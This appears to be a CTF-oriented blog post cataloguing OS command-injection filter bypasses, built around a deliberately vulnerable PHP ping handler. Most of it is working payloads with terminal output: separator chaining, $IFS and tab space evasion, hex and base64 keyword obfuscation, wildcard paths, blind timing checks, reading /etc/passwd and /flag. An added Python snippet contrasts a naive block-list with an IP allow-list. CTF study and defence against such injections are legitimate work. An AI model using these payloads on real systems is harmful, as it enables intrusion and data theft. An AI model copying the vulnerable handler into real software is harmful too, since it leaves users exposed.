Preface

You first need to understand which strings the challenge filters or blocks, so it is best to use the tricks below together with fuzzing.

Command separators

Suppose you are given PHP like this:

<?php
    $ip = $_GET['ip'];
    // the request parameter is concatenated straight into the shell command
    system("ping -c 4 " . $ip);
?>

Clearly ip is under your control, so you need to construct a payload that gets your own command executed correctly.

The available separators are as follows:

  • ; (Semicolon): Allows you to execute multiple commands sequentially.
  • && (AND): Execute the second command only if the first command succeeds (returns a zero exit status).
  • || (OR): Execute the second command only if the first command fails (returns a non-zero exit status).
  • & (Background): Execute the command in the background, allowing the user to continue using the shell.
  • | (Pipe): Takes the output of the first command and uses it as the input for the second command.
command1; command2   # Execute command1 and then command2
command1 && command2 # Execute command2 only if command1 succeeds
command1 || command2 # Execute command2 only if command1 fails
command1 & command2  # Execute command1 in the background
command1 | command2  # Pipe the output of command1 into command2

Bypassing space filtering

1. $IFS$9, ${IFS}, $IFS
cat$IFS$9/flag
2. Using the < character
Input redirection. The < character tells the shell to read the contents of the file specified.
cat</flag
cat</etc/passwd
3.ANSI-C Quoting

X=$'uname\x20-a'&&$X

4. Tab bypass
The tab character can sometimes be used as an alternative to spaces. In ASCII, the tab character is represented by the hexadecimal value 09.
;ls%09-al%09/home
5. Newline bypass
Commands can also be run in sequence with newlines:

original_cmd_by_server
ls
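As an added defensive example (not code from the original post): the `ip` parameter of the ping handler above, checked two ways. A constructed, deliberately naive block-list of shell metacharacters is compared with an allow-list that accepts only a syntactically valid IP literal, using the separator, newline and tab variants shown above as input.

```python
"""Allow-list vs block-list validation for the `ip` parameter of the
ping handler above (added example, not code from the original post)."""
import ipaddress
import re
from urllib.parse import unquote

# Constructed, deliberately naive block-list of the kind CTF challenges use:
# it rejects the separators listed above plus space, backtick and '$',
# but says nothing about newline, tab or '<'.
NAIVE_BLOCKLIST = re.compile(r"[;&|`$ ]")


def blocklist_allows(param: str) -> bool:
    """True when the naive filter would pass the URL-decoded value through."""
    return NAIVE_BLOCKLIST.search(unquote(param)) is None


def allowlist_allows(param: str) -> bool:
    """True only for a syntactically valid IPv4/IPv6 literal, nothing else.

    ipaddress.ip_address() rejects any extra embedded characters, so no
    separator, glob or shell expansion can survive the check.
    """
    try:
        ipaddress.ip_address(unquote(param))
    except ValueError:
        return False
    return True


# Constructed request values: one benign IP plus variants built from the
# separators and space-bypass tricks shown above.
SAMPLE_PARAMS = [
    "127.0.0.1",
    "127.0.0.1;cat$IFS$9/flag",      # ';' and '$' are caught by the block-list
    "127.0.0.1;who$@ami",            # ';' and '$' are caught by the block-list
    "127.0.0.1%0Acat</flag",         # newline + '<' slips past it
    "127.0.0.1%0Als%09-al%09/home",  # newline + tab slips past it
]


def leaked_by_blocklist(params):
    """Values the naive filter passes but the allow-list rejects."""
    return [p for p in params if blocklist_allows(p) and not allowlist_allows(p)]


if __name__ == "__main__":
    for p in SAMPLE_PARAMS:
        print(f"{p!r:38} blocklist={blocklist_allows(p)} allowlist={allowlist_allows(p)}")
    print("leaked:", leaked_by_blocklist(SAMPLE_PARAMS))
```

The block-list already fails against two of the five constructed values, which is why validating the parameter against what it is supposed to be (an IP address) is the only reliable fix for the handler above.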

Bypassing string matching

1. When the following kinds of quotes appear in pairs they can be used to split up a keyword. Note in particular that a comma must go inside the {}; once {,} is added, the command is executed one extra time.
c``a""t f{,}l``a''g
2. Escaping with echo -e
echo -e '\x31' outputs 1, and echo -e '\x2f\x66\x6c\x61\x67' outputs /flag.
There are also the following variants:

swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd

swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd

swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd

swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash

3. Backslash-newline bypass

  • Commands can be broken into parts by using backslash followed by a newline

    $ cat /et\
    c/pa\
    sswd
  • URL encoded form would look like this:

    cat%20/et%5C%0Ac/pa%5C%0Asswd

4. Bypassing with commands (when the slash is blocked)
Command execution without backslash and slash (Linux bash):

swissky@crashlab:~$ echo ${HOME:0:1}
/

swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ echo . | tr '!-0' '"-1'
/

swissky@crashlab:~$ tr '!-0' '"-1' <<< .
/

swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash

${HOME:0:1} has other uses as well: it takes HOME from the environment and slices off a substring. You can first dump env, check whether any variable contains the character you need, and then slice it out to get around the filter.
5. Bypassing with slashes and backslashes

w\ho\am\i
/\b\i\n/////s\h

6. Bypassing with $@ and $0
$@ expands to nothing when there are no positional parameters, so who$@ami becomes whoami. $0: Refers to the name of the script if it's being run as a script. If you're in an interactive shell session, $0 will typically give the name of the shell.

who$@ami
echo whoami|$0

7. Bypassing with $()

who$()ami
who$(echo am)i
who`echo am`i

8. Wildcard and variable expansion bypass

sh-5.2# echo /???
/bin /dev /etc /lib /mnt /opt /run /srv /sys /tmp /usr /var
sh-5.2# echo /???/??
/bin/ar /bin/as /bin/cp /bin/dd /bin/df /bin/du /bin/id /bin/ip /bin/ld /bin/ln /bin/ls /bin/mv /bin/nc /bin/nl /bin/nm /bin/od /bin/pg /bin/pr /bin/ps /bin/rm /bin/sg /bin/sh /bin/ss /bin/su /bin/tc /bin/tr /bin/ul /bin/wc /bin/xz /dev/fd /lib/tc /sys/fs /var/db
sh-5.2# echo /???/???
/bin/arp /bin/awk /bin/cal /bin/cat /bin/cmp /bin/col /bin/ctr /bin/cut /bin/dcb /bin/dir /bin/dwp /bin/env /bin/fmt /bin/gdb /bin/gio /bin/git /bin/gpg /bin/gpm /bin/jar /bin/jdb /bin/jps /bin/ksu /bin/ldd /bin/lz4 /bin/mev /bin/mvn /bin/php /bin/pip /bin/psl /bin/ptx /bin/pwd /bin/rev /bin/scp /bin/sed /bin/seq /bin/sln /bin/ssh /bin/sum /bin/tac /bin/tar /bin/tee /bin/tic /bin/toe /bin/top /bin/tty /bin/vim /bin/who /bin/xjc /bin/xxd /bin/yes /bin/zic /bin/zip /bin/zsh /dev/bus /dev/cpu /dev/dri /dev/fb0 /dev/log /dev/mem /dev/net /dev/ppp /dev/pts /dev/rtc /dev/shm /dev/snd /dev/tty /dev/vcs /dev/vda /dev/vdb /etc/X11 /etc/cni /etc/gdb /etc/iwd /etc/php /etc/rpc /etc/ssh /etc/ssl /etc/xdg /etc/zsh /lib/awk /lib/gio /lib/icu /lib/iwd /lib/jvm /lib/lua /lib/php /lib/ssh /lib/tar /lib/zsh /run/log /srv/ftp /sys/bus /sys/dev /usr/bin /usr/lib /usr/src /var/lib /var/log /var/opt /var/run /var/tmp
sh-5.2# echo /???/??t
/bin/cat /bin/cut /bin/fmt /bin/git /dev/net /var/opt

Clearly /???/??t matches our cat; running it directly passes everything from /bin/cut ... to /var/opt as arguments to cat.
So we append /???/p??s??, which matches /bin/passwd /etc/passwd /etc/pkcs11 /lib/pkcs11.
/???/??t /???/p??s?? therefore gets us the /etc/passwd we want. If the filter is less strict, you can of course replace some of the ? with the correct characters to cut down the number of matches.
echo /???/../f*** will likewise match a flag file in the root directory.
Besides cat-ing directly as above, we can also define a variable:

test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}

9. Wildcard bypass (Windows)

powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc

Time-based blind injection (tongue in cheek)

swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

If the comparison matches, the command sleeps for 5 s, which makes the result obvious.

Inline execution

This is done with backticks: cat `ls` first runs ls, then feeds the output of ls to cat as its argument string, so the result is that every file listed by ls in the current directory gets printed.
This combines with the string-matching bypasses above: the payload `echo Y2F0IC9mbGFn | base64 -d` will execute cat /flag.

Closing remarks

The title of this article is a bit clickbaity, because I can't cover everything in one go, so I'll add whatever else comes to mind later. I'm also leaving a placeholder here: I plan to build a very handy one-click tool, similar to fenjing, that automatically bypasses all the checks.
